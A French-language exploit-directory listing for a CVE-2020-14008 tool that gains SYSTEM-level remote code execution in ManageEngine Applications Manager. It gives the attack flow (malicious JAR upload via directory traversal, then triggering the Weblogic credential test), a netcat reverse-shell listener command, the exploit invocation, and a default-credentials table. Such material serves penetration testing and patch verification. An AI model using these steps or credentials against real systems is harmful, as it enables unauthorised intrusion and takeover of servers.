Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2020-14008 — CVE-2020-14008 - RCE dans ManageEngine Applications Manager | Kitploit
Outils/GitHubGitHub/0x0d3ad/cve-2020-14008
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à DistanceDéveloppement de Charges Utiles
GitHub0x0d3ad/cve-2020-14008

CVE-2020-14008

CVE-2020-14008 - RCE dans ManageEngine Applications Manager

Voir le dépôt
31il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2020-14008 - Exécution de code à distance (RCE) dans ManageEngine Applications Manager

Exécution de code à distance authentifiée via un téléchargement arbitraire de fichiers dans Zoho ManageEngine Applications Manager (versions <= 14720).

Résumé de la vulnérabilité

Télécharger l’outil
DétailValeur
CVECVE-2020-14008
CVSS7.2 (Élevé)
TypeRCE authentifiée / Téléchargement arbitraire de fichiers
ProduitZoho ManageEngine Applications Manager
AffectéVersions 14720 et inférieures
PrérequisIdentifiants administrateur valides
RésultatReverse shell au niveau SYSTEM

L'exploit abuse de la fonctionnalité de test des identifiants du moniteur Weblogic. Un administrateur authentifié télécharge un fichier weblogic.jar malveillant vers le chemin de bibliothèque Weblogic attendu. Lorsque le test d'identifiants est déclenché, ManageEngine charge weblogic.jndi.Environment depuis le JAR téléchargé via JarLoader.loadClass() et newInstance(), exécutant du code Java arbitraire.

Prérequis

Système

  • Python 3.x
  • Java JDK (javac et jar dans le PATH)
  • nc (netcat) pour capturer le reverse shell

Dépendances Python

root@kitploit:~
pip3 install requests urllib3 lxml

Utilisation

1. Lancer le listener

root@kitploit:~
nc -lvnp 1337

2. Exécuter l'exploit

root@kitploit:~
python3 cve-2020-14008.py <URL> <USERNAME> <PASSWORD> <LHOST> <LPORT>

Exemples

root@kitploit:~
# Basique
python3 cve-2020-14008.py https://192.168.100.2:8443 admin admin 192.168.100.3 1337

Déroulement de l'exploit

  1. Connexion - S'authentifier avec des identifiants administrateur, obtenir un cookie de session
  2. Énumération - Récupérer le répertoire d'installation de base de ManageEngine
  3. Construction du JAR - Compiler une classe Java malveillante (weblogic.jndi.Environment) contenant un reverse shell dans weblogic.jar
  4. Téléchargement - Télécharger le JAR vers classes/weblogic/version8/ via une traversée de répertoire (solution de repli : créer une tâche planifiée pour le déplacer)
  5. Déclenchement - Invoquer le test d'identifiants Weblogic à /testCredential.do, qui charge et instancie la classe malveillante
  6. Shell - Le reverse shell se connecte au listener

Identifiants par défaut

IdentifiantMot de passe
adminadmin
adminpassword
administratoradministrator
guestguest

Dépannage

ErreurSolution
release version 7 not supportedJava 21+ a abandonné la cible Java 7. Le script utilise --release 8
FileNotFoundError: weblogic.jarLa compilation du JAR a échoué. Vérifiez que javac et jar sont dans le PATH
No valid response from used sessionIdentifiants invalides
Actionname not foundLa création de la tâche a échoué, vérifiez les permissions administrateur

Références

  • NVD - CVE-2020-14008
  • Exploit-DB #48793
  • Avis de sécurité ManageEngine

Avertissement

Cet outil est fourni uniquement pour les tests de pénétration autorisés et la recherche en sécurité. Toute utilisation non autorisée contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas la permission de tester est illégale.